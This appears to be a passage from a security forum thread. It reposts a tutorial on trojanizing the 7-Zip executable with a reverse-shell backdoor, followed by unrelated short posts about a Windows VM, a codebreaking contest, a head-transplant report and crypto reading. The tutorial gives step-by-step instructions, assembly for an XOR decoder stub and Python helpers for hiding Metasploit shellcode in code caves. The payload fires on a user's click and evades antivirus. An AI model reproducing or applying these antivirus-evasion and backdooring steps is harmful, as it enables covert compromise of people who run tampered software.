WaitForSingleObject argument is -1 this means that it will wait an infinite amount of time before starting other threads. Which simply means that if we execute the binary it will spawn a reverse shell, but the normal functionality of 7zip would halt till we close our reverse shell. This post helps in finding and fixing WaitForSingleObject. We simply need to modify the opcode that supplies the -1 (the argument for WaitForSingleObject) to NOP. Next we need to POP the register values off the stack (to restore the stack to its pre-shellcode state) using POPFD and POPAD at the end of the shellcode. After POPFD and POPAD we need to add the 5 hijacked instructions (copied earlier in hijack execution flow) back, to make sure that after shellcode execution our 7zip program functions normally. We save the modifications as 7zFMAddedSectionHijackedShelled.exe Spawning shell We set up a listener on our Kali box and execute the binary 7zFMAddedSectionHijackedShelled.exe. We get a shell. The 7zip binary works fine as well with no interruption in functionality. We got a shell! How are we doing detection wise? Detection Rate Not so good! Though that was expected, since we added a new writeable, executable section in the binary and used a known Metasploit shellcode without any encoding. Pros of adding a new section header method You can create a large section header. Large space means you don't need to worry about space for shellcode; you can even encode your shellcode a number of times without having to worry about its size. This could help in bypassing anti-viruses. Cons of adding a new section header method Adding a new section header and assigning it an execution flag could alert anti-viruses. Not a good approach in terms of AV detection rate. It will also increase the size of the original file; again we wouldn't want to alert the AV or the victim about a change of file size. High detection rate. Keeping in mind the cons of the new section header method, next we will look at two more methods that will help us achieve usability and a low detection rate for the backdoor. Triggering shellcode upon user interaction + Codecaves What we have achieved so far is to create a new header section, place our shellcode in it and hijack the execution flow to our shellcode and then back to the normal functionality of the application.
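As a byte-level footnote to that recap (my own sketch, not from the original article): the 5-byte hijack written at the entry point is a near JMP, opcode E9 followed by a little-endian 32-bit offset relative to the end of the instruction, which is what Ollydbg assembles for us.

import struct

def near_jmp(source_va: int, target_va: int) -> bytes:
    # the offset is measured from the address of the next instruction (source + 5)
    rel32 = (target_va - (source_va + 5)) & 0xFFFFFFFF
    return b"\xE9" + struct.pack("<I", rel32)

print(near_jmp(0x004538D8, 0x0047E000).hex())   # the JMP 0047E000 patch used above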
In this section we will be chaining together two methods to achieve a low detection rate and to mitigate the shortcomings of the new section header method discussed above. The following techniques are discussed: How to trigger our shellcode based on user interaction with a specific functionality. How to find and use code caves. Code Caves Code caves are dead/empty blocks in the memory of a program which can be used to inject our own code. Instead of creating a new section, we can use existing code caves to implant our shellcode. We can find code caves of different sizes in almost any PE. The size of the code cave does matter! We want a code cave larger than our shellcode so we can inject the shellcode without having to split it into smaller chunks. The first step is to find a code cave; Cave Miner is a handy Python script for this: you provide the minimum size of the cave as a parameter and it will show you all the code caves larger than that size. finding code caves for injection We got two code caves larger than 700 bytes; both of them contain enough space for our shellcode. Note down the virtual address of both caves. The virtual address is the starting address of the cave. Later we will hijack the execution flow by jumping to these virtual addresses. We will be using both caves later; for now, we only require one cave to implant our shellcode in. We can see that the code cave is only readable; we have to make it writable and executable for it to execute our shellcode. We do that with LordPE. Making .rsrc writeable and executable Triggering Shellcode Upon user interaction Now that we have a code cave we can jump to, we need to find a way to redirect the execution flow to our shellcode upon user interaction. Unlike in the previous method, we don't want to hijack the execution flow right after the program is run. We want to let the program run normally and execute the shellcode upon user interaction with a specific functionality, for example clicking a specific tab. To accomplish this we need to find reference strings in the application. We can then hijack the address of a specific reference string by modifying it to jump to the code cave. This means that whenever that specific string is accessed in memory the execution flow will get redirected to our code cave. Sounds good? Let's see how we achieve this. Open the 7zip program in Ollydbg > right click > search for > all reference text strings Found a suitable reference string In the reference strings we found an interesting string, a domain (http://www.7-zip.org). The memory address of this domain gets accessed when a user clicks on about > domain. Website button functionality Note that we can have multiple user interaction triggers that can be backdoored in a single program using the referenced strings found. For the sake of an example we are using the domain button on the about page which, when clicked, opens the website www.7-zip.org in the browser. Our objective is to trigger the shellcode whenever a user clicks on the domain button. Now we have to add a breakpoint at the address of the domain string so that we can then modify its opcode to jump to our code cave when a user clicks on the website button. We copy the address of the domain string, 0044A8E5, and add a breakpoint. We then click on the domain button in the 7zip program.
The execution stops at the breakpoint as seen in the below screenshot: Execution stops at break point address 0044A8E5 (http://www.7-zip.org/) Now we can modify this address to jump to the code cave, so when a user clicks on the website button the execution flow jumps to our code cave, where in the next step we will place our shellcode. First we copy a couple of instructions after the 0044A8E5 address, as they will be used again when we point the execution flow back to it after shellcode execution to make sure 7zip keeps functioning normally. inject backdoor into exe After modification to jmp 00477857 we save the executable as 7zFMUhijacked.exe. Note that the address 00477857 is the starting address of codecave 1. We load 7zFMUhijacked.exe in Ollydbg and let it execute normally; we then click on the website button. We are redirected to an empty code cave. Nice! We have redirected the execution flow to the code cave upon user interaction. To keep this post concise we will skip the next steps of adding and modifying the shellcode, as these steps are the same as explained above in “Adding Shellcode” and “Modifying shellcode”. Spawning Shell We add the shellcode, modify it, restore the execution flow back to where we hijacked it (0044A8E5) and save the file as 7zFMUhijackedShelled.exe. The shellcode used is the stageless windows reverse TCP shell. We set a netcat listener, run 7zFMUhijackedShelled.exe, and click on the website button. Fully Undetectable backdoor PE Files Everything worked as we expected and we got a shell back! Let's see how we are doing detection wise. Triggering shellcode upon user interaction + Codecaves detection That's good! We are down from 16/36 to 3/38, thanks to code caves and triggering the shellcode upon user interaction with a specific functionality. This shows a weakness in the detection mechanism of most anti-viruses, as they are not able to detect a known msfvenom shellcode without any encoding just because it is in a code cave and triggered upon user interaction with a specific functionality. The detection rate of 3/38 is good but not good enough (fully undetectable). Considering the self imposed restrictions, the only viable route from here seems to be custom encoding of the shellcode and decoding it in memory upon execution. Custom Encoding Shellcode Building upon what we previously achieved, executing shellcode from a code cave upon user interaction with a specific program functionality, we now want to encode the shellcode using an XOR encoder. Why do we want to use XOR? A couple of reasons: firstly, it is fairly easy to implement; secondly, we don't have to write a separate decoder for it, because XORing a value twice with the same key gives back the original value. We will encode the shellcode with XOR once and save it on disk. Then we will XOR the encoded value again in memory at runtime to get back the original shellcode. Antiviruses wouldn't be able to catch it because it is being done in memory! We require 2 code caves for this purpose: one for the shellcode and one for the encoder/decoder. In the code caves section above we found 2 code caves larger than 700 bytes; both of them have enough space for the shellcode and the encoder/decoder. Below is the flow chart diagram of the execution flow.
Custom encoding shellcode in code caves + Triggering shellcode upon user interaction So we want to hijack the program execution when the user clicks on the domain button and redirect it to CC2 (starting address 0047972e), which will contain the XOR encoder/decoder stub opcodes. The stub encodes/decodes the shellcode that resides in CC1 (starting address 00477857). After CC2 execution is complete we jump to CC1 and execute the shellcode, which spawns back a shell; after the shellcode, we jump back to where we initially hijacked the execution flow (the domain button click) to make sure the functionality of the 7zip program remains the same and the victim doesn't notice any interruptions. Sounds like a long ride, let's GO! Note that the steps performed in the last section won't be repeated, so reference back to hijacking execution upon user interaction, adding shellcode in codecaves, modifying shellcode and restoring the execution flow back to where we hijacked it. First we hijack the execution flow from address 0044A8E5 (clicking the domain button) to the CC2 starting address 0047972e and save the modifications as a file on disk. We run the modified 7zip file in Ollydbg and trigger the hijacking process by clicking on the domain button. Hijacking execution flow to CC2 Now that we are in CC2, before writing our XOR encoder here, we first jump to the starting address of CC1 and implant our shellcode so that we get the exact addresses that we have to use in the XOR encoder. Note that the first step of hijacking to CC2 can also be performed at the end, as it won't impact the overall execution flow illustrated in the flowchart above. We jump to CC1, implant and modify the shellcode and restore the execution flow to 0044A8E5, from where we hijacked to CC2, to make sure the 7zip program functionality runs smoothly after the shellcode. Note that implanting, modifying shellcode and restoring execution flow are already explained in previous sections. Bottom of shellcode at CC1 The above screenshot shows the bottom of the shellcode at CC1. Note down the address 0047799B; this is where the shellcode ends, and the next instructions are for restoring the execution flow back. So we have to encode from the start of the shellcode at address 00477859 up to 0047799B. We move to 0047972e, the starting address of CC2, and write the XOR encoder; the following are the opcodes for the XOR encoder implementation. MOV ECX,00477859 // Load the starting address of the shellcode into ECX XOR BYTE PTR DS:[ECX],0B // XOR the byte at [ECX] with the key 0B INC ECX // Increase ECX to move to the next address CMP ECX,0047799B // Compare ECX with the ending address of the shellcode JLE SHORT 00479733 // If we have not passed the end yet, take a short jump back to the XOR operation JMP 7zFM2.00477857 // Otherwise jump to the start of the shellcode As we are encoding the opcodes in CC1, we have to make sure the header section in which CC1 resides is writeable, otherwise Ollydbg will show an access violation error. Refer back to the codecaves section to see how to make it writable and executable. We add a breakpoint at JMP 7zFM2.00477857 so that we stop after the encoding is performed and we are about to jump back to the (now encoded) shellcode. If we go back to CC1 we can see that our shellcode is encoded now. Custom encode shellcode in memory All that is left is to save the modifications of both the shellcode at CC1 and the encoder at CC2 to a file, which we named 7zFMowned.exe. Let's see if it's working as intended.
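As an aside, the same XOR-with-0x0B transform can be reproduced offline to sanity-check the bytes before and after the in-memory pass; a small sketch of mine, with a made-up example byte string, since XORing twice with the same key restores the original.

KEY = 0x0B

def xor_encode(data: bytes, key: int = KEY) -> bytes:
    # XOR every byte with the single-byte key; running it twice is a no-op
    return bytes(b ^ key for b in data)

sample = bytes.fromhex("fce8820000006089e531c0")   # illustrative payload prefix only
encoded = xor_encode(sample)
print(encoded.hex())
print(xor_encode(encoded) == sample)               # True: double XOR restores the original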
Spawning shell We set up a listener on port 8080 on our Kali box, run 7zFMbackdoored.exe in Windows and click on the domain button. The 7zip website pops up in the browser, and if we go back to our Kali box, we have a shell. How are we doing detection wise? Fully undetectable PE file using dual code caves, custom encoder and trigger upon user interaction Conclusion Great! We have achieved a fully undetectable backdoored PE file that remains functional and keeps the same size. Sursa: https://haiderm.com/fully-undetectable-backdooring-pe-files/
-
- 5
-
Windows 10 Enterprise (Evaluation - Build 201710) 20 GB download This VM will expire on 1/15/18. We currently package our virtual machines for four different virtualization software options: VMWare, Hyper-V, VirtualBox, and Parallels. This evaluation virtual machine includes: Windows 10 Fall Creators Update Enterprise Evaluation Visual Studio 2017 (Build 15.4) with the UWP, desktop C++, and Azure workflows enabled Windows developer SDK and tools (Build 16299.15, installed as part of VS UWP workflow) Windows UWP samples (Latest) Windows Subsystem for Linux enabled Developer mode, Bash on Ubuntu on Windows, and containers enabled The Microsoft Software License Terms for the Windows 10 VMs supersede any conflicting Windows license terms included in the VMs. Link: https://developer.microsoft.com/en-us/windows/downloads/virtual-machines
-
- 1
-
Welcome to the 2017 Codebreaker Challenge! To get started, register for an account using your .edu email address. Then, visit the Challenge page to receive your instructions for starting on the first task in the challenge. For information on reverse engineering and for some tips on how to get started, check out the Resources page. Good luck! Link: https://codebreaker.ltsnet.net/home
-
- 2
-
The world's first human head transplant has been carried out on a corpse in China, according to Italian professor Sergio Canavero. During an 18-hour operation, experts demonstrated that it is possible to successfully reconnect the spine, nerves and blood vessels of a severed head. Professor Canavero, director of the Turin Advanced Neuromodulation Group, made the announcement at a press conference in Vienna this morning. The procedure was carried out by a team led by Dr Xiaoping Ren, who last year grafted a head onto the body of a monkey. A full report of the Harbin Medical University team's procedure and a timeframe for the live transplant are expected within the next few days. Speaking at the press conference, Professor Canavero said: 'For too long nature has dictated her rules to us. 'We're born, we grow, we age and we die. For millions of years humans has evolved and 110 billion humans have died in the process. 'That's genocide on a mass scale. 'We have entered an age where we will take our destiny back in our hands. 'It will change everything. It will change you at every level. 'The first human head transplant, in the human mode, has been realised. 'The surgery lasted 18 hours. The paper will be released in a few days.' 'Everyone said it was impossible, but the surgery was successful.' Professor Canavero added that the team's next step is to perform a full head swap between brain dead organ donors. Sursa & articol complet: http://www.dailymail.co.uk/sciencetech/article-5092769/World-s-human-head-transplant-carried-out.html
-
you can start with: Istoria codurilor secrete - Laurent Joffrin (very "readable"; at the end of each chapter you'll have something to "crack") you can also try The Codebreakers - Kahn David (history of cryptography from ancient Egypt to the time of its writing) https://www.coursera.org/learn/crypto (you'll understand why I recommended it) https://cryptopals.com/ so you won't have any free time left